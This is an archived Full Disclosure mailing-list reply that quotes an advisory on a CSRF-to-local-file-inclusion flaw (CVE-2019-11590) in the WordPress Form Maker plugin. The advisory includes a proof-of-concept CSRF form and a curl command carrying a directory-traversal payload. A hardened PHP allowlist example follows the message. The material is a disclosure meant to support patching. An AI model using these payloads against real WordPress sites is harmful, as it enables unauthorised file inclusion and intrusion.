<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Henri Salo <henri () nerv fi>
<em>Date</em>: Mon, 29 Apr 2019 18:07:27 +0300
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">
On Fri, Apr 05, 2019 at 02:01:21PM +0300, Panagiotis Vagenas wrote:
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;"># Exploit Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: <a rel="nofollow" href="http://web-dorado.com/">http://web-dorado.com/</a>
# Software Link: <a rel="nofollow" href="https://wordpress.org/plugins/form-maker">https://wordpress.org/plugins/form-maker</a>
# Version: 1.13.2
# Tested on: WordPress 5.1
Description
-----------
Plugin implements the following AJAX actions:
- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`
All of them call the function `form_maker_ajax`. This function
dynamically loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal, thus leading to a Local File Inclusion
vulnerability.
Plugin also registers the following AJAX actions:
- `paypal_info`
- `checkpaypal`
Those seem like they are only available to PRO version users, yet they
are also vulnerable to this attack.
Additionally the following AJAX actions are registered in PRO version:
- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`
Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that they are also available to
non-registered users, making this attack directly exploitable, without
using a CSRF attack. In this case the vulnerable param is `$_REQUEST['page']`.
PoC
---
### Using a CSRF attack
```html
<form method="post"
      action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index">
  <label>AJAX action:
    <select name="action">
      <optgroup label="Free version">
        <option value="generete_csv">generete_csv</option>
        <option value="generete_xml">generete_xml</option>
        <option value="formmakerwdcaptcha">formmakerwdcaptcha</option>
        <option value="formmakerwdmathcaptcha">formmakerwdmathcaptcha</option>
        <option value="product_option">product_option</option>
        <option value="FormMakerEditCountryinPopup">FormMakerEditCountryinPopup</option>
        <option value="FormMakerMapEditinPopup">FormMakerMapEditinPopup</option>
        <option value="FormMakerIpinfoinPopup">FormMakerIpinfoinPopup</option>
        <option value="show_matrix">show_matrix</option>
        <option value="FormMakerSubmits">FormMakerSubmits</option>
        <option value="FormMakerSQLMapping">FormMakerSQLMapping</option>
        <option value="select_data_from_db">select_data_from_db</option>
        <option value="manage_fm">manage_fm</option>
        <option value="FMShortocde">FMShortocde</option>
      </optgroup>
      <optgroup label="Pro Version">
        <option value="paypal_info">paypal_info</option>
        <option value="checkpaypal">checkpaypal</option>
        <option value="get_frontend_stats">get_frontend_stats</option>
        <option value="frontend_show_map">frontend_show_map</option>
        <option value="frontend_show_matrix">frontend_show_matrix</option>
        <option value="frontend_paypal_info">frontend_paypal_info</option>
        <option value="frontend_generate_csv">frontend_generate_csv</option>
        <option value="frontend_generate_xml">frontend_generate_xml</option>
      </optgroup>
    </select>
  </label>
  <button type="submit" value="Submit">Submit</button>
</form>
```
### Without leveraging the CSRF vulnerability
```sh
curl 'http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php' \
  -d 'action=get_frontend_stats&page=/../../../../../index'
```
</pre></blockquote><pre style="margin: 0em;">
MITRE assigned CVE-2019-11590 for this issue.
-- 
Henri Salo
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
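As an added illustration (neither the plugin's code nor part of the advisory above), the dispatch pattern the advisory describes, placed beside a hardened replacement: the action name is never used as a path fragment but looked up in a fixed allowlist, the handler is derived from the WordPress hook that fired rather than from `$_GET`/`$_POST`, the request is capability- and nonce-checked, and the resolved file is verified to stay under the plugin directory. The action keys come from the advisory; the handler file names, the `fm_` helper names and the nonce name are assumptions.

```php
<?php
// Added illustration (not the plugin's or the advisory's code) of the dispatch
// pattern the advisory describes and a hardened replacement for it.
// VULNERABLE SHAPE (assumed): the request-controlled action name becomes part of
// an include path, so a value like "/../../../../../index" leaves the plugin dir.
function form_maker_ajax_vulnerable() {
    $action = isset( $_GET['action'] ) ? $_GET['action'] : $_POST['action'];
    require_once plugin_dir_path( __FILE__ ) . 'admin/' . $action . '.php';
}

// HARDENED: the action is a key into a fixed allowlist, never a path fragment.
// Keys are action names from the advisory; the file names are assumptions.
const FM_AJAX_HANDLERS = array(
    'generete_csv' => 'admin/generate_csv.php',
    'generete_xml' => 'admin/generate_xml.php',
    'show_matrix'  => 'admin/show_matrix.php',
);

function fm_resolve_handler( $action ) {
    if ( ! is_string( $action ) || ! array_key_exists( $action, FM_AJAX_HANDLERS ) ) {
        return false;
    }
    $base = realpath( plugin_dir_path( __FILE__ ) );
    $file = realpath( $base . '/' . FM_AJAX_HANDLERS[ $action ] );
    // Defence in depth: the resolved file must still live under the plugin dir.
    if ( $base === false || $file === false || strpos( $file, $base . DIRECTORY_SEPARATOR ) !== 0 ) {
        return false;
    }
    return $file;
}

function form_maker_ajax_hardened() {
    // Authorisation plus a nonce (nonce name 'fm_ajax' is an assumption) closes the
    // CSRF vector for these admin-side actions.
    if ( ! current_user_can( 'manage_options' ) || ! check_ajax_referer( 'fm_ajax', 'nonce', false ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Take the action from the hook that fired rather than from $_GET or $_POST:
    // admin-ajax.php dispatches on $_REQUEST['action'], so the two can disagree.
    $action = substr( current_action(), strlen( 'wp_ajax_' ) );
    $file   = fm_resolve_handler( $action );
    if ( $file === false ) {
        wp_send_json_error( 'unknown action', 400 );
    }
    require_once $file;
}

foreach ( array_keys( FM_AJAX_HANDLERS ) as $fm_action ) {
    add_action( 'wp_ajax_' . $fm_action, 'form_maker_ajax_hardened' );
}
```

The advisory's unauthenticated `frontend_*` actions would be registered on `wp_ajax_nopriv_*` hooks with the same allowlist lookup but without the capability check, which is exactly why their allowlist should be the narrowest.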
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><a name="10" href="10">WordPress Plugin Form Maker by WD [CSRF → LFI]</a> <em>Panagiotis Vagenas (Apr 05)</em>
<ul>
<li><strong>Re: WordPress Plugin Form Maker by WD [CSRF → LFI]</strong> <em>Henri Salo (Apr 30)</em>
</li>
</ul>
</li>
</ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>